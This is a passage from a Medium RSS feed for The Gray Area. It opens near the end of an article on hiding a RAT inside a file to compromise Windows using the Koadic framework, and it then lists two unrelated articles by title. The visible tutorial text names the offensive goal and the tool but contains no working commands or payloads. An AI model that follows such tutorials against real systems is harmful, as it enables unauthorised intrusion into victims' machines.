src="https://cdn-images-1.medium.com/max/900/1*BpccglCkfB9-LXl1gPubOQ.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dKNyxskCkVT4YE5yos_rZQ.png" /></figure><p>After the victim’s machine shuts down, a “Timed out” message appears in Koadic.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1006/1*YPvOcsvrNbkYOYOpd6IiNw.png" /></figure><p>We can exit Koadic with Ctrl + C.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/881/1*4YWG1X-CYBCXTtSCuOFMyw.png" /></figure><h4>Conclusion</h4><p>In conclusion, that’s how a<strong> </strong>RAT is hidden inside a file and used to hack a Windows system. It’s a straightforward and informative process.</p><p>Thank you for reading this article. I hope that you have found this information provided to be valuable and helpful.</p><p>Follow me for more articles.</p><p>Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!</p><p><a href="https://medium.com/the-gray-area"><strong>The Gray Area</strong></a><strong> </strong>is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out <a href="https://forms.gle/MpZD2wE4LhJqCufR7"><strong>this form</strong></a>! To get updates whenever The Gray Area publishes an article, check out our Twitter page, <a href="https://twitter.com/TGAonMedium?s=20&amp;t=R_mmy5ZFGXAluwT3UuLmzw"><strong>@TGAonMedium</strong></a><strong>.</strong></p><p><a href="https://thegrayarea.tech">The Gray Area</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d8b7a979c1c5" width="1" height="1" alt=""><hr><p><a href="https://thegrayarea.tech/concealing-a-rat-within-a-file-to-compromise-a-windows-system-d8b7a979c1c5">Concealing a RAT Within a File to Compromise a Windows System</a> was originally published in <a href="https://thegrayarea.tech">The Gray Area</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[With AI, the House Wins Even More]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://thegrayarea.tech/with-ai-the-house-wins-even-more-bb72b1619b10?source=rss----8ae97a84818b---4"><img src="https://cdn-images-1.medium.com/max/1024/1*sIAm7yJI1mEqonmayCzP2w.png" width="1024"></a></p><p class="medium-feed-snippet">How casinos tilt the odds even further in their favor with AI</p><p class="medium-feed-link"><a href="https://thegrayarea.tech/with-ai-the-house-wins-even-more-bb72b1619b10?source=rss----8ae97a84818b---4">Continue reading on The Gray Area »</a></p></div>]]></description>
            <link>https://thegrayarea.tech/with-ai-the-house-wins-even-more-bb72b1619b10?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/bb72b1619b10</guid>
            <category><![CDATA[surveillance]]></category>
            <category><![CDATA[machine-learning]]></category>
            <category><![CDATA[artificial-intelligence]]></category>
            <category><![CDATA[facial-recognition]]></category>
            <category><![CDATA[casino]]></category>
            <dc:creator><![CDATA[Andrew W. Pearson]]></dc:creator>
            <pubDate>Wed, 13 Dec 2023 15:13:05 GMT</pubDate>
            <atom:updated>2024-05-08T08:49:14.243Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[Active vs Passive Learning in Cybersecurity]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://thegrayarea.tech/active-vs-passive-learning-in-cybersecurity-019f1e717555?source=rss----8ae97a84818b---4"><img src="https://cdn-images-1.medium.com/max/2600/0*CqwCG9aRNveTI_7Q" width="5184"></a></p><p class="medium-feed-snippet">Short answer: only employ active learning</p><p class="medium-feed-link"><a href="https://thegrayarea.tech/active-vs-passive-learning-in-cybersecurity-019f1e717555?source=rss----8ae97a84818b---4">Continue reading on The Gray Area »</a></p></div>]]></description>
            <link>https://thegrayarea.tech/active-vs-passive-learning-in-cybersecurity-019f1e717555?source=rss----8ae97a84818b---4</link>
            <guid isPermaLink="false">https://medium.com/p/019f1e717555</guid>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[technology]]></category>
            <category><![CDATA[education]]></category>
            <category><![CDATA[learning]]></category>
            <dc:creator><![CDATA[Sara V]]></dc:creator>
            <pubDate>Mon, 27 Nov 2023 03:45:42 GMT</pubDate>
            <atom:updated>2024-07-15T20:58:49.771Z</atom:updated>
        </item>
    </channel>
</rss>